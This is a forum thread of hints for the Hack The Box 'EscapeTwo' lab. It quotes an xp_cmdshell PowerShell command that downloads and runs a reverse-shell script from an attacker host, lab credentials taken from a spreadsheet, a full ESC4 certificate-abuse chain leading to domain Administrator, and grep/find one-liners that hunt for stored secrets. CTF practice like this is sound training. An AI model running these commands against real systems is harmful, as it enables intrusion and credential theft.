Posts: 196
Threads: 31
Joined: Apr 2024
Jan 11, 2025, 10:58 PM
(This post was last modified: Jan 11, 2025, 10:59 PM by maggi.)
(Jan 11, 2025, 10:43 PM)Asdjkl01 Wrote: (Jan 11, 2025, 10:42 PM)userhere123 Wrote: (Jan 11, 2025, 10:14 PM)maggi Wrote: (Jan 11, 2025, 10:08 PM)userhere123 Wrote: Kinda stuck at " mssqlclient.py" , any tip??
enable xp cmdshell
use nishang (or whatever you come up with)
EXEC xp_cmdshell 'powershell -NoProfile -ExecutionPolicy Bypass -Command "& {IEX(New-Object Net.WebClient).DownloadString(''http://10.10.xx.xx:8000/Invoke-PowerShellTcp.ps1'')}"'
find creds for user
WINRM 10.129.69.181 5985 DC01 [+] sequel.htb\ryan:W****** (Pwn3d!) Can't enable xp_cmdshell due to permission restrictions
You logged in as SA?
(Jan 11, 2025, 10:42 PM)StingEm Wrote: (Jan 11, 2025, 09:38 PM)Asdjkl01 Wrote: Any nudge for the config file? Could you share how you found it also if not to much? I'm just struggling with enumeration.
For initial Foothold - once you log in as rose:
┌──(kali-admin㉿XXXPURPLEK)-[~/HTB/Escape2]
└─$ smbclient \\\\XX.XX.XX.XX/Accounting\ Department -U rose
Password for [WORKGROUP\rose]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sun Jun 9 06:52:21 2024
.. D 0 Sun Jun 9 06:52:21 2024
accounting_2024.xlsx A 10217 Sun Jun 9 06:14:49 2024
accounts.xlsx A 6780 Sun Jun 9 06:52:07 2024
6367231 blocks of size 4096. 888343 blocks available
smb: \> get accounts.xlsx
getting file \accounts.xlsx of size 6780 as accounts.xlsx (20.6 KiloBytes/sec) (average 20.6 KiloBytes/sec)
smb: \> get accounting_2024.xlsx '
getting file \accounting_2024.xlsx of size 10217 as ' (22.3 KiloBytes/sec) (average 21.6 KiloBytes/sec)
inside of those .xlsx you will find: [sharedStrings.xml]
<sst count="25" uniqueCount="24">
<si>
</si>
<si>
<t xml pace="preserve">Last Name</t>
</si>
<si>
<t xmlpace="preserve">Email</t>
</si>
<si>
<t xmlpace="preserve">Username</t>
</si>
<si>
<t xmlpace="preserve">Password</t>
</si>
<si>
</si>
<si>
<t xmlpace="preserve">Martin</t>
</si>
<si>
</si>
<si>
</si>
<si>
<t xmlpace="preserve">0fwz7Q4mSpurIt99</t>
</si>
<si>
<t xmlpace="preserve">Oscar</t>
</si>
<si>
<t xmlpace="preserve">Martinez</t>
</si>
<si>
<t xmlpace="preserve">oscar@sequel.htb</t>
</si>
<si>
<t xmlpace="preserve">oscar</t>
</si>
<si>
<t xmlpace="preserve">86LxLBMgEWaKUnBG</t>
</si>
<si>
<t xmlpace="preserve">Kevin</t>
</si>
<si>
<t xmlpace="preserve">Malone</t>
</si>
<si>
</si>
<si>
<t xmlpace="preserve">kevin</t>
</si>
<si>
</si>
<si>
<t xmlpace="preserve">NULL</t>
</si>
<si>
<t xmlpace="preserve">sa@sequel.htb</t>
</si>
<si>
<t xmlpace="preserve">sa</t>
</si>
<si>
<t xmlpace="preserve">MSSQLP@ssw0rd!</t>
</si>
</sst>
That should get you going - at least I hope that is what you were asking
Thanks for the response! I'm actually looking for Ryan's creds right now. I can't seem to find the config file that contains his password. Any help with process would be appreciated too! Like tools that were used to find Ryan's password and such, since that is what I'm stuck on.
EXEC sp_configure 'show advanced option', '1';
RECONFIGURE
EXECUTE sp_configure 'xp_cmdshell', 1
RECONFIGURE
PS C:\SQL2019\ExpressAdv_ENU> cat sql-Configuration.INI
Posts: 5
Threads: 0
Joined: Oct 2024
(Jan 11, 2025, 10:55 PM)userhere123 Wrote: (Jan 11, 2025, 10:43 PM)Asdjkl01 Wrote: (Jan 11, 2025, 10:42 PM)userhere123 Wrote: (Jan 11, 2025, 10:14 PM)maggi Wrote: (Jan 11, 2025, 10:08 PM)userhere123 Wrote: Kinda stuck at " mssqlclient.py" , any tip??
enable xp cmdshell
use nishang (or whatever you come up with)
EXEC xp_cmdshell 'powershell -NoProfile -ExecutionPolicy Bypass -Command "& {IEX(New-Object Net.WebClient).DownloadString(''http://10.10.xx.xx:8000/Invoke-PowerShellTcp.ps1'')}"'
find creds for user
WINRM 10.129.69.181 5985 DC01 [+] sequel.htb\ryan:W****** (Pwn3d!) Can't enable xp_cmdshell due to permission restrictions
You logged in as SA?
(Jan 11, 2025, 10:42 PM)StingEm Wrote: (Jan 11, 2025, 09:38 PM)Asdjkl01 Wrote: Any nudge for the config file? Could you share how you found it also if not to much? I'm just struggling with enumeration.
For initial Foothold - once you log in as rose:
┌──(kali-admin㉿XXXPURPLEK)-[~/HTB/Escape2]
└─$ smbclient \\\\XX.XX.XX.XX/Accounting\ Department -U rose
Password for [WORKGROUP\rose]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sun Jun 9 06:52:21 2024
.. D 0 Sun Jun 9 06:52:21 2024
accounting_2024.xlsx A 10217 Sun Jun 9 06:14:49 2024
accounts.xlsx A 6780 Sun Jun 9 06:52:07 2024
6367231 blocks of size 4096. 888343 blocks available
smb: \> get accounts.xlsx
getting file \accounts.xlsx of size 6780 as accounts.xlsx (20.6 KiloBytes/sec) (average 20.6 KiloBytes/sec)
smb: \> get accounting_2024.xlsx '
getting file \accounting_2024.xlsx of size 10217 as ' (22.3 KiloBytes/sec) (average 21.6 KiloBytes/sec)
inside of those .xlsx you will find: [sharedStrings.xml]
<sst count="25" uniqueCount="24">
<si>
</si>
<si>
<t xmlpace="preserve">Last Name</t>
</si>
<si>
<t xmlpace="preserve">Email</t>
</si>
<si>
<t xmlpace="preserve">Username</t>
</si>
<si>
<t xmlpace="preserve">Password</t>
</si>
<si>
</si>
<si>
<t xmlpace="preserve">Martin</t>
</si>
<si>
</si>
<si>
</si>
<si>
<t xmlpace="preserve">0fwz7Q4mSpurIt99</t>
</si>
<si>
<t xmlpace="preserve">Oscar</t>
</si>
<si>
<t xmlpace="preserve">Martinez</t>
</si>
<si>
<t xmlpace="preserve">oscar@sequel.htb</t>
</si>
<si>
<t xmlpace="preserve">oscar</t>
</si>
<si>
<t xmlpace="preserve">86LxLBMgEWaKUnBG</t>
</si>
<si>
<t xmlpace="preserve">Kevin</t>
</si>
<si>
<t xmlpace="preserve">Malone</t>
</si>
<si>
</si>
<si>
<t xmlpace="preserve">kevin</t>
</si>
<si>
</si>
<si>
<t xmlpace="preserve">NULL</t>
</si>
<si>
<t xmlpace="preserve">sa@sequel.htb</t>
</si>
<si>
<t xmlpace="preserve">sa</t>
</si>
<si>
<t xmlpace="preserve">MSSQLP@ssw0rd!</t>
</si>
</sst>
That should get you going - at least I hope that is what you were asking
Thanks for the response! I'm actually looking for Ryan's creds right now. I can't seem to find the config file that contains his password. Any help with process would be appreciated too! Like tools that were used to find Ryan's password and such, since that is what I'm stuck on.
as Oscar
The admin password is at the end of the list of accounts. Use that one and you'll be able to get it working.
Posts: 14
Threads: 0
Joined: Nov 2024
(Jan 11, 2025, 10:47 PM)arrogantoverlord Wrote: could anyone help with privesc? for some reason it fails to request the cert, and it doesn't even come up as vulnerable (trying as ryan) 
any help how u get ryan
Posts: 5
Threads: 0
Joined: Jan 2025
How to log in as SA. to enable xpcmd shell
Posts: 4
Threads: 0
Joined: Aug 2024
(Jan 11, 2025, 11:01 PM)Zer0Gr2vity Wrote: (Jan 11, 2025, 10:47 PM)arrogantoverlord Wrote: could anyone help with privesc? for some reason it fails to request the cert, and it doesn't even come up as vulnerable (trying as ryan)
any help how u get ryan
Ryan password is the same one found in the sql-Configuration.INI file.
Posts: 75
Threads: 5
Joined: Sep 2024
Jan 11, 2025, 11:33 PM
(This post was last modified: Jan 11, 2025, 11:34 PM by StingEm.)
OKay - I love the DMs - maybe It wasn't posted: Ryan's creds are located inside the sql-Configuration.INI file.
PS C:\SQL2019\ExpressAdv_ENU> cat sql-Configuration.INI
FYI password is the same as sql_svc account.
looks like flast94711 was a little faster - and 100% correct
Posts: 9
Threads: 0
Joined: Sep 2023
mssqlclient.py -p 1433 'sa'@dc01.sequel.htb -dc-ip {ip} (login with password found in unpacked excel spreadsheet found in smb share as rosa)
enable_xp_cmdshell
execute powershell #3 base64 reverse shell with your xpcmdshell
find ryan password in sql ini file on the box as sql_svc
login as ryan to get user txt
ingest with bloodhound to find you have write all on the ca svc that can do esc4 attack as ryan
exploitation:
bloodyAD --host dc01.sequel.htb -d sequel.htb -u ryan -p {ryan_pass} set owner ca_svc ryan
dacledit.py -action 'write' -rights 'FullControl' -principal 'ryan' -target 'ca_svc' 'sequel.htb'/'ryan':'{ryan_pass}'
certipy-ad shadow auto -u ryan@sequel.htb -p '{ryan_pass} -dc-ip {ip} -ns {ip} -target dc01.sequel.htb -account ca_svc
KRB5CCNAME=$PWD/ca_svc.ccache certipy-ad find -scheme ldap -k -debug -target dc01.sequel.htb -dc-ip {ip} -vulnerable -stdout
KRB5CCNAME=$PWD/ca_svc.ccache certipy-ad template -k -template DunderMifflinAuthentication -target dc01.sequel.htb -dc-ip {ip}
certipy-ad req -u ca_svc -hashes :{ca_svc_hash} -ca sequel-DC01-CA -target DC01.sequel.htb -dc-ip {ip} -template DunderMifflinAuthentication -upn Administrator@sequel.htb -ns {ip} -dns {ip}
certipy-ad auth -pfx ./administrator.pfx -dc-ip {ip}
evilwinrm -i dc01.sequel.htb -i administrator -H {admin_hash}
note: if you get some dumb shit DNS error it's because the automation reverted the template, so you need to redo the steps
Posts: 4
Threads: 0
Joined: Aug 2024
(Jan 11, 2025, 11:21 PM)userhere123 Wrote: How to log in as SA. to enable xpcmd shell
Try running impacket's mssqlclient but only specify the user and the host/ip. It should then prompt you for the password.
Posts: 5
Threads: 0
Joined: Oct 2024
(Jan 11, 2025, 11:33 PM)StingEm Wrote: OKay - I love the DMs - maybe It wasn't posted: Ryan's creds are located inside the sql-Configuration.INI file.
PS C:\SQL2019\ExpressAdv_ENU> cat sql-Configuration.INI
FYI password is the same as sql_svc account.
looks like flast94711 was a little faster - and 100% correct
Thanks to both of you for the replies. I got it rooted, I was wondering how you can about finding that file. I know it's labeled obviously but did you know about SQL configs before hand and knew where to look? Thanks again!
Posts: 75
Threads: 5
Joined: Sep 2024
(Jan 12, 2025, 12:19 AM)Asdjkl01 Wrote: (Jan 11, 2025, 11:33 PM)StingEm Wrote: OKay - I love the DMs - maybe It wasn't posted: Ryan's creds are located inside the sql-Configuration.INI file.
PS C:\SQL2019\ExpressAdv_ENU> cat sql-Configuration.INI
FYI password is the same as sql_svc account.
looks like flast94711 was a little faster - and 100% correct
Thanks to both of you for the replies. I got it rooted, I was wondering how you can about finding that file. I know it's labeled obviously but did you know about SQL configs before hand and knew where to look? Thanks again!
Happy to help - the key to Pentesting - is searching thru EVERYTHING - but eventually you will just see certain files like a config.ini , etc you checking 'em. It just takes time - its better to be slow and through then miss something and have to go back to it.
I will give you a trick of mine (many call a time suck) but.. I have a made a script that runs these for me:
grep -r -i -E "config|password|ini|passwd|pwd|hash|hashed|secret|key|token|credentials|auth|ssh|mysql|postgres|dbpass|db_password|dbuser|db_user|passwd|password|pwd|hash|hashed|secret|key|token|credentials|auth|ssh|mysql|postgres|dbpass|db_password|dbuser|db_user" / 2>/dev/null
and
find / -type f \( -iname "*config*" -o -iname "*password*" -o -iname "*ini*" -o -iname "*passwd*" -o -iname "*pwd*" -o -iname "*hash*" -o -iname "*hashed*" -o -iname "*secret*" -o -iname "*key*" -o -iname "*token*" -o -iname "*credentials*" -o -iname "*auth*" -o -iname "*ssh*" -o -iname "*mysql*" -o -iname "*postgres*" -o -iname "*dbpass*" -o -iname "*db_password*" -o -iname "*dbuser*" -o -iname "*db_user*" -o -iname "*.conf" -o -iname "*.cfg" -o -iname "*.ini" -o -iname "*.env" -o -iname "*.properties" -o -iname "*.json" -o -iname "*.yaml" -o -iname "*.yml" -o -iname "*.xml" -o -iname "*.sh" -o -iname "*.py" -o -iname "*.php" \) 2>/dev/null
I have similar scripts to run via power shell - etc.
You may find them useful in the future if so enjoy!
|
